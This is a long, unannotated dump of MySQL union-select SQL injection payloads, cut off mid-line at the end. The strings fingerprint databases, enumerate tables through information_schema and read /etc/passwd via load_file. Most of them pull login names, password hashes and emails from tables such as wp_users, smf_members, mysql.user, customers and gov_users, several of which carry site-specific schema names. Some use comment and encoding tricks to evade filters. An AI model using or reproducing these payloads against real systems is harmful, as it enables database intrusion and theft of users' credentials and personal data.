1,2,3,concat_ws(0x3a,database(),user(),version()),5,6,7/* -1 union select 1,2,3,concat_ws(0x3a,database(),user(),version()),5,6,7,8,9-- -1 union select 1,2,3,concat_ws(0x3a,database(),version(),user())-- -1 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8 -- -1 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9-- -1 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11-- -1 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -1 union select 1,2,3,concat_ws(0x3a,ID_GROUP,memberName,passwd,passwordSalt) from smf_members -1 union select 1,2,3,concat_ws(0x3a,id,name,password,email,ip_address),5,6,7 from ibf_members limit 1,1/* -1 union select 1,2,3,concat_ws(0x3a,id,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from users/* -1 union select 1,2,3,concat_ws(0x3a,id,user_login,user_pass) from wp_users -1 union select 1,2,3,concat_ws(0x3a,id,user,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from admin/* -1 union select 1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9 from db2908_phplist.admin/* -1' union select 1,2,3,concat_ws(0x3a,LoginName,Password),5,6 from AdminUsers/* -1 union select 1,2,3,concat_ws(0x3a,login,passwd,user,id),5 from profiles/* -1 union select 1,2,3,concat_ws(0x3a,login,password,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from persons-- -1' UNION SELECT 1,2,3,concat_ws(0x3a,login, pwd),5,6 FROM cin.Users/* -1 union select 1,2,3,concat_ws(0x3a,log,psw),5,6,7 from psw-- -1' union select 1,2,3,concat_ws(0x3a,name,member_login_key) from ibf_members limit 0,1/* -1 union select 1,2,3,concat_ws(0x3a,name,pass),5,6,7,8,9,10,11 from users limit 0,1/* -1' union select 1,2,3,concat_ws(0x3a,user(),database(),version())/* 1' union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5/* -1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6-- -1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6/* 1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6 -- 1' union select 1,2,3,concat_Ws(0x3a,user(),database(),version()),5,6/* -1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7-- 1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15-- -1 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7 from members -1 union select 1,2,3,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),5-- -1 union select 1,2,3,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17 -- -1 /*!union*/ /*!select*/ 1,2,3,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- 1 union select 1,2,3,concat_ws(0x3a,user_id,user_email,user_password),5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from users/* -1 union select 1,2,3,concat_ws(0x3a,user_login,user_pass,user_email),5,6,7 from wp_users/* -1 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from USERS limit 0,1/* -1 UNION SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from gov_users-- 1 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jasaweb_cms.user limit 0,1 -- 1' UNION SELECT 1,2,3,concat_ws(0x3a,username,password,icq,email),5 from users/* -1 union select 1,2,3,concat_ws(0x3a,username,password,version()),5,6,7,8,9 from users/* -1 union select 1,2,3,concat_ws(0x3a,username,userpass),5,6 from auth_users-- -1 union select 1,2,3,concat_ws(0x3a,user_name,user_password),5,6,7,8 from mw_user -- -1 UNION SELECT 1,2,3,concat_ws(0x3a,username,user_password),5,6,7 from xtremelabs_forums.phpbbforums_users limit 1,1 -- -1 union select 1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from kasseler_users-- -1' union select 1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10 from mysql.user/* -1 union select 1,2,3,concat_ws(0x3a,user,password) from mysql.user -- -1 union select 1,2,3,concat_ws(0x3a,user,password) from mysql.user/* -1 union select 1,2,3,concat_ws(0x3a,user,pwd) from users -- -1 union select 1,2,3,concat_ws(0x3a,user(),version()),5,6,7,8,9,10,11,12,13,14 -- -1 UnIon selECt 1,2,3,concat_ws(0x3a,user(), @@version_compile_os,version()),5,6,7,8,9,10-- -1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10/* -1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16-- -1' union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -1 union select 1,2,3,concat_ws(0x3a,user(), version(), database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* -1 UnIon selECt 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,load_file(0x2f6574632f706173737764),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),11 -- -1 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os) -- 1 union select 1,2,3,concat_ws(0x3a,version(),database(),user())-- -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9 -- -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9-- 1 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11-- -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8 from users/* -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7-- -1 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* 1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/* -1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10 from information_schema.tables-- 1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9 limit 1,1 -1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),concat_ws(0x3a,username,password),6,7 from users-- -1 union select 1,2,3,concat_ws(0x3a,version(),user(),database(),@@version_compile_os)/* -1 union select 1,2,3,concat_ws(0x3c6272202f3e,ID_MEMBER,memberName,dateRegistered,posts,ID_GROUP,lngfile,lastLogin,realName,instantMessages,unreadMessages,buddy_list,pm_ignore_list,messageLabels,passwd,emailAddress,personalText,gender,birthdate,websiteTitle,websiteUrl,location,ICQ,AIM,YIM,MSN,hideEmail,showOnline,timeFormat,signature,timeOffset,avatar,pm_email_notify,karmaBad,karmaGood,usertitle,notifyAnnouncements,notifyOnce,notifySendBody,notifyTypes,memberIP,memberIP2,secretQuestion,secretAnswer,ID_THEME,is_activated,validation_code,ID_MSG_LAST_VISIT,additionalGroups,smileySet,ID_POST_GROUP,totalTimeLoggedIn,passwordSalt,authtitle),5,6,7,8,9,10,11,12 from smf_members-- -1 union select 1,2,3,concat_ws(0x3C62723E,DATABASE(),VERSION(),USER()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 -- -1 union select 1,2,3,concat_ws(0x3,user(),version(),database()),5/* -1 union select 1,2,3,concat_ws(0x3,version(),user(),database())/* -1 union select 1,2,3,concat_ws(0x3,version(),user(),database()),5,6-- -1 union select 1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10/* -1 union select 1,2,3,Concat_ws(0xb,version(),user(),database()),5/* -1 union select 1,2,3,concat_ws(char(124),version(),database(),user())-- -1 union select 1,2,3,concat_ws(char(124),version(),database(),user()),5-- -1 UNION SELECT 1,2,3,concat_ws(char(124),version(),database(),user()),5,6,7,8,9,10,11,12,13,14-- -1 union select 1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13-- -1 union select 1,2,3,concat_ws(char(58,58),user(),database(),version()),5,6/* -1 union select 1,2,3,concat_ws(char(58),acc_login,convert(acc_pwd using cp1251),acc_email),5,6 from account/* -1 union select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8 -- -1 union select 1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os),5,6,7,8,9,0-- 1 union select 1,2,3,concat_ws(user(),database,version()),5,6,7,8,9 limit 1,1/* -1 union select 1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())-- -1 union select 1,2,3,concat_ws(version(),database(),user())-- -1 union select 1,2,3,concat_ws(version(),database(),user()),5-- 1' union select 1,2,3,concat_ws(':',version(),user(),database()),5,6,7,8,9,10-- -1 union select 1,2,3,convert(concat(name,char(58),pwd,char(58),command,char(58),email,char(58),url,char(58),country,char(58),city),char),5,6 from users limit 0,1/* -1) union select 1,2,3,convert(concat(user(),0x20,database(),0x20,version()) using cp1251)/* -1 union select 1,2,3,convert(concat(user,char(58),password) using latin1),5,6,7,8 from mysql.user limit 0,1/* -1 union select 1,2,3,convert(concat_ws(0x3a,user(),database(),version()) using latin1),5,6,7,8,9,10,11/* -1 union select 1,2,3,convert(concat_ws(0x3a,version(),user(),database()) using latin1),5,6,7,8,9,10,11,12,13-- 1 union select 1,2,3,convert(concat_ws(' : ',version(),database(),user()) using latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -1 union select 1,2,3,count(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables/* -1' union select 1,2,3,database(),5,user()/* -1 union select 1,2,3,database(),6,7,8,9,10/* -1 union select 1,2,3,DATABASE(),USER(),6,7,8,9,10 -1 union select 1,2,3,file_priv,5,6,7,8,9 from mysql.user/* -1 union select 1,2,3 from information_schema.tables -- -1 union select 1,2,3 from mysql.user-- -1 union select 1,2,3 from wma_users/* -1 UNION SELECT 1,2,3,group_concat(admin_un,0x3B,admin_pw SEPARATOR 0x0b),5 FROM b1685.Admin -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tab19DSAdmin -- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabBelvoirAdmin -- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabBrewAdmin -- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabBULLAdmin-- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabChalkAdmin-- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabCORAdmin-- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabGBNAdmin-- -1 union select 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7 from tabGhAdmin-- -1 union select 1,2,3,group_concat(admUsername,0x3a,admPassword,0x0a),5,6,7 from tabAdvAdmin-- -1 union select 1,2,3,group_concat(name,0x3a,password),5,6 from anime.dle_users -- -1 /*!union*/ /*!select*/ 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.tables -- 1 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables -- -1 UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema=0x7537363638395F636F7963-- -1' union select 1,2,3,group_concat(table_name),group_concat(table_name),6,7,8 from information_schema.tables group by table_schema limit 1,1/* 1' UnIon selECt 1,2,3,group_concat(table_name separator '
'),5 from information_schema.tables-- -1 union select 1,2,3,group_concat(USERNAME,0x3a,PASSWORD,0x0a),5,6,7 from registration -- -1 union select 1,2,3,lastname,5,pwd,7,8,9,10,11,12,13,14,country,16,17,18,city,20,21,22,23,24,25,26,email from users limit 5000,5001/* -1 union select 1,2,3,LOAD_FILE(0x4579),5,6,7,email from mmo_users limit 0,1000 -- -1 union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14 from users/* -1 union select 1,2,3,name,mail,password,7,8,9,10,11 from shop/* 1' union select 1,2,3,passwd,5,6,7,8,9 from users/* -1 union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user/* -1 union select 1,2,3,password,5,6,7,8 from forum limit 0,10/* -1 union select 1,2,3,password,5,user,7,8,9 from mysql.user/* -1 union select 1,2,3,password from _manager/* -1 union select 1,2,3,(select group_concat(table_name) AS url from information_schema.tables WHERE table_schema=0x6131393131355f31) -- -1 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables-- -1 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13 FROM information_schema.tables-- -1 union select 1,2,3,table_name,5,6,7,8,9,10,11 from information_schema.tables limit 2,1/* -1' union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables limit 30,100 /* -1 union select 1,2,3,table_name,5,6,7,8 from information_schema.tables limit 30,1-- -1 union select 1,2,3,table_name,5,6,7 from information_schema.tables/* -1/**/union/**/select/**/1,2,3,table_name,5,6 from INFORMATION_SCHEMA.TABLES limit 42,1/* -1 union select 1,2,3,table_name,5,6 from information_schema.tables where table_name not in (0x434f4c4c4154494f4e53,0x434f4c4c4154494f4e5f4348415241435445525f5345545f4150504c49434142494c495459,0x434f4c554d4e53,0x434f4c554d4e5f50524956494c45474553,0x4b45595f434f4c554d4e5f5553414745,0x50524f46494c494e47,0x524f5554494e4553,0x534348454d415441,0x534348454d415f50524956494c45474553,0x53544154495354494353,0x5441424c4553,0x5441424c455f434f4e53545241494e5453,0x5441424c455f50524956494c45474553,0x5452494747455253,0x555345525f50524956494c45474553,0x5649455753,0x4348415241435445525f53455453)/* 1 union select 1,2,3,table_name,5 from information_schema.tables-- -1 union select 1,2,3,table_name,5 from information_schema.tables where table_name like 0x257573657225/* -1 union select 1,2,3,table_name from information_schema.tables/* -1' union select 1,2,3,table_name from information_schema.tables limit 1,1/* -1 union select 1,2,3,table_schema,5,6,7 from information_schema.tables where table_name=char(117,115,101,114,115) limit 0,1/* -1' union select 1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5,6 -- -1 union select 1,2,3,unhex(hex(concat_ws(0x3a,username,user_password))) from jykwepb_forum.forum_users where user_level=1 limit 0,1 -1 union select 1,2,3,unhex(hex(concat_ws(char(58),version(),user(),database(),@@version_compile_os))),5,6,7,8,9,0,1,2,3-- -1' union select 1,2,3,unhex(hex(version())),5,6,7,8,9,10/* -1 union select 1,2,3,user(),5/* -1 union select 1,2,3,user(),5,6,7,8-- -1 union select 1,2,3,user(),5,6,version()/* -1 union select 1,2,3,user(),5,version(),7,8,9,10/* 1 union select 1,2,3,user(),database(),version(),7,8,9,10,11,12,13-- -1 union select 1,2,3,user_login,user_password,6,7,8,9,0,1,2 from users limit 1,1 -1' union select 1,2,3,username,5,6,7,8,9,10,11,password,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from users limit 4,1/* -1 union select 1,2,3,user(),version()/* 1 union select 1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -1 union select 1,2,3,version(),5,6,7-- -1 union select 1,2,3,version(),5,6,7/* -1' /*!UNION*/ SELECT 1,2,3,version(),5,6,7,8 -- -1 UNION SELECT 1,2,3,version(),5,6,7,8,9 -1 union select 1,2,3,version(),5,6,7,8,9,10/* -1 union select 1,2,3,version(),5,6,7,8,9,10,11,12/* -1 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -1 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 -- -1 UNION SELECT 1,2,3,VERSION(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/* -1 union select 1,2,3,version(),5,6,7,8,9,10 from users/* -1 union select 1,2,3,version(),5,6,7,8,9 from mysql.user/* -1 union select 1,2,3,version(),5,DATABASE(),7,8,9-- -1 union select 1,2,3,version(),5,user(),7,8,database()-- -1 union select 1,2,3,Version(),5,user(),7,database(),9,10,11,12,13/* -1 union select 1,2,3,version(),database(),6,user()/* -1 UNION SELECT 1,2,3,version(),database(),user(),7,8,9,10,11,12,13 -- -1 union select 1,2,3,version(),database(),user(),7,8,9,10,11,12,13,14/* 1 union select 1,2,aes_decrypt(aes_encrypt(concat(0x2,version(),user(),database()),0x71),0x71),4,5,6/* 1' union select 1,2,aes_decrypt(aes_encrypt(concat(0x3a,version(),0x3a,database(),0x3a,user()),0x71),0x71),4,5 LIMIT 1,1/* 1' union select 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14/* 1' union select 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT CONCAT(customers_email_address,0x3a3a,customers_password) FROM customers limit 32,1)),0x71),0x71),4,5,6/* -1 union select 1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11/* 1 union select 1,2,aes_decrypt(aes_encrypt(concat(version(),char(58),database(),char(58),user()),1),1),4,5,66666,7,8,9,10,11/* 1 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x2a,version(),database(),user()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16 limit 1,1/* -1 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x71),0x71),4,5 from mysql.user/* 1 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16 -- -1 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(char(32),user(),version(),database(),@@version_compile_os,@@datadir),1),1),group_concat(table_name),5,6 from information_schema.tables where table_schema=CHAR(103,97,109,97,110,101,103,95,119,101,98,100,98) -1 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(version(),0x3a,database(),0x3a,user()),0x71),0x71),4,5,6,7,8/* 1 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(version(),database(),user()),0x71),0x71),4,5,6,7,8,9/* -1 union select 1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11 from information_schema.tables limit 0,1-- -1 union select 1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9/* -1' union select 1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8 -- -1 UNION SELECT 1,2,CAST(USER() AS BINARY),4,CAST(DATABASE() AS BINARY),CAST(VERSION() AS BINARY),7,8/* 1) union select 1,2,concat(0x3a3a,u_username,0x3a3a,u_password),4 from users/* -1 union select 1,2,concat(0x3a,database(),0x3a,user(),0x3a,version()),4,5,6,7-- -1 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -1 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4-- -1 union select 1,2,concat(0x3d,user(),version(),name,pass),4,5 from users/* 1 union select 1,2,concat(0x3,version(),database(),user()),4,5,6/* 1 UNION SELECT 1,2,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 1 union /*!select 1,2,concat(0x7c,user_id,0x7c,user_login,0x7c,user_password,0x7c,user_name,0x7c,user_email,0x7c),4 from users*/-- -1 union select 1,2,concat(admin_name,char(58),pwd,char(58),id),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from sbwmd_admin/* -1 union select 1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10/* -1 union select 1,2,concat(clients_fio,char(58),clients_phone,char(58),clients_login,char(58),clients_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from clients limit 0,1/* -1 union select 1,2,concat(convert(user using cp1251),0x3a,convert(password using cp1251)),4,5,6,7,8,9 from mysql.user/* -1 union select 1.2.concat(customers_lastname.0x3a.customers_password.0x3a.customers_email_address).4.5.6.7.8 from customers-- -1 union select 1,2,concat(database(),0x3a,user(),0x3a,version()),4 -- -1 union select 1,2,concat(database(),0x3a,user(),0x3a,version()),4/* -1 union select 1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6,7 -1 union select 1,2,concat(database(),char(58),user(),char(58),password,char(58),version()),4,5 from users/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8/* '-1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13/* -1 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,concat(e_mail,0x3a),4 from users/* -1 union select 1,2,concat(id,0x3a,login,0x3a,pass) from gallery_admin limit 0,1-- -1 union select 1,2,concat(id,char(58),name,char(58),content,char(58),password,char(58),email,char(58),fio,char(58),dolznost,char(58),user_group) from acc_admin_users/* -1 union select 1,2,concat(id,char(58),user_login,char(58),user_pass,char(58),user_name,char(58),user_mail,char(58),user_url,char(58),user_icq,char(58),user_maillist,char(58),user_uroven) from svgroup_avenbibl.main_user limit 0,1/* -1 union select 1,2,concat(login,0x3a,email,0x3a,pass) from user/* -1 union select 1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12 from users/* -1 union select 1,2,concat(login,0x3a,pass),4,5,6,7,8 from admin/* -1 union select 1,2,concat(login,0x3a,password,0x3a),4 from u57027_3.fs_admin limit 0,10/* -1 union select 1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 from users/* 1 union select 1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13 from user/* -1 union select 1,2,concat(login,0x3a,password) from users/* -1 union select 1,2,concat(login,char(58),pass,char(58),name,char(58),prof,char(58),firma,char(58),production,char(58),email,char(58),adress,char(58),telefon),4,5,6,7 from registration limit 10,1/* -1 union select 1,2,concat(login,char(58),password),1,5 from users where id=134/* -1 union select 1,2,concat(name,char(58),password),4,5,6,7,8,9,10,11,concat(name,char(58),password),13,14,15,16 from users limit 0,1/* -1 union select 1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from user/* -1 union select 1,2,concat(uname,0x3a,pass),4,5,6,7,8,9 from users limit 1,1/* -1 union select 1,2,concat(user(),0x2,database(),0x2,version()),4,5,6,7-- -1 union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6/* -1 union select 1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -1 union select 1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14 from mysql.user limit 0,1-- -1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5,6 from mysql.user limit 0,1/* -1 union select 1,2,concat(user,0x3a,password) from mysql.user/* -1 union select 1,2,concat(user(),0x3a,@@version,0x3a,database()),4/* -1' union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7/* -1 union select 1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6,7/* -1 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10/* -1' union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10/* -1 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/* -1 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14/* 1" union select 1,2,concat(user(),0x3,version(),0x3,database()),4,5/* -1 union select 1,2,concat(user(),char(58),database(),char(58),version()),4,5,6,7,8,9,10,11,12/* -1 union select 1,2,concat(user,char(58),password),4,5,6,7,8 from users/* -1 union select 1,2,concat(user(),char(58),version(),char(58),database(),char(58),@@version_compile_os),4,5,6,7,8,9,10 from users-- -1 union select 1,2,concat(username,0x3a3a,password),4,5,6,7,8,9,10,11,12,13,14 from user limit 0,20/* -1 union select 1,2,concat(username,0x3a3a,password),4,5,6,7,8,9 from admin_users limit 1,10/* -1 union select 1,2,concat(username,0x3a3a,password),4,5,6,7,8 from prokit_users/* -1 union select 1,2,concat(username,0x3a3a,password),4,5,6 from u60233_new.hyip_user limit 0,1/* -1 union select 1,2,concat(username,0x3a,password,0x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from phorum_users/* -1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from login_table-- -1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from admin-- -1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3 from drinksadmin/* -1 union select 1,2,concat(user_name,0x3a,user_pass),4,5,6,7 from users/* -1 union select 1,2,concat(user_name,0x3b,password) from users limit 0,1/* -1 union select 1,2,concat(username,0x3,password),4,5,6,7 from avcboost_furniture.admin_user -- 1 union select 1,2,concat(username,char(45),userpass),4,5 FROM gc_cardusers-- -1 union select 1,2,concat(username,char(58),email,char(58),password),4,5,6,7 from phorum_users/* -1 union select 1,2,concat(username,char(58),password),4,5,6,6,8,9,10,11,12,13,14,15 from user/* -1 union select 1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from admin/* -1 union select 1,2,concat(username,char(58),password),4 from administrators/* -1 UNION SELECT 1,2,concat(username,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 FROM tbl_users LIMIT 0,1 -- -1 union select 1,2,concat(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from 